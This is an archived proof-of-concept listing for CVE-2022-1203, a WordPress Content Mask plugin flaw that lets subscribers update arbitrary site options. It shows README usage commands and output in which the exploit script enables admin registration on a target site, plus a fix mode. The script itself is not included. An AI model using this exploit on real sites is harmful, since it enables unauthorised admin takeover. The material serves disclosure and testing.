Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2022-1203 PoC — WordPress plugin Content Mask 安全漏洞

Source
Associated Vulnerability
Title:WordPress plugin Content Mask 安全漏洞 (CVE-2022-1203)
Description:WordPress和WordPress plugin都是WordPress基金会的产品。WordPress是一套使用PHP语言开发的博客平台。该平台支持在PHP和MySQL的服务器上架设个人博客网站。WordPress plugin是一个应用插件。 WordPress plugin Content Mask 1.8.4.1之前版本存在安全漏洞,该漏洞源于没有进行授权和跨站请求伪造检查,也没有验证要更新的选项。
Description
Content Mask < 1.8.4 - Subscriber+ Arbitrary Options Update
Readme
# CVE-2022-1203
Content Mask &lt; 1.8.4 - Subscriber+ Arbitrary Options Update

## Description

The Content Mask WordPress plugin before 1.8.4.1 does not have authorisation and CSRF checks in various AJAX actions, as well as does not validate the option to be updated to ensure it belongs to the plugin. As a result, any authenticated user, such as subscriber could modify arbitrary blog options


## How to use

Exploit
---
```

$ python3 CVE-2022-1203.py -u http://wordpress.lan -un user -p useruser1
The plugin version is below 1.8.3.2.
The plugin version is 1.8.3.2
Vulnerability check: http://wordpress.lan
Logged in successfully.
Option set successfully: http://wordpress.lan/wp-admin/admin-ajax.php
Option set successfully: http://wordpress.lan/wp-admin/admin-ajax.php
You can now register a user as an admin user. Remember to run --fix yes after you have registered to prevent others exploiting the site.
```

Fix
---
```
python3 CVE-2022-1203.py -u http://wordpress.lan -un user -p useruser1 --fix yes
Vulnerability check: http://wordpress.lan
Logged in successfully.
Option set successfully: http://wordpress.lan/wp-admin/admin-ajax.php
Option set successfully: http://wordpress.lan/wp-admin/admin-ajax.php
Fixed: You can not longer register

```
File Snapshot

[4.0K] /data/pocs/1ea0f48ae1c38e609926c3aa07af83becb4b77af ├── [6.9K] CVE-2022-1203.py ├── [ 11K] LICENSE └── [1.2K] README.md 0 directories, 3 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.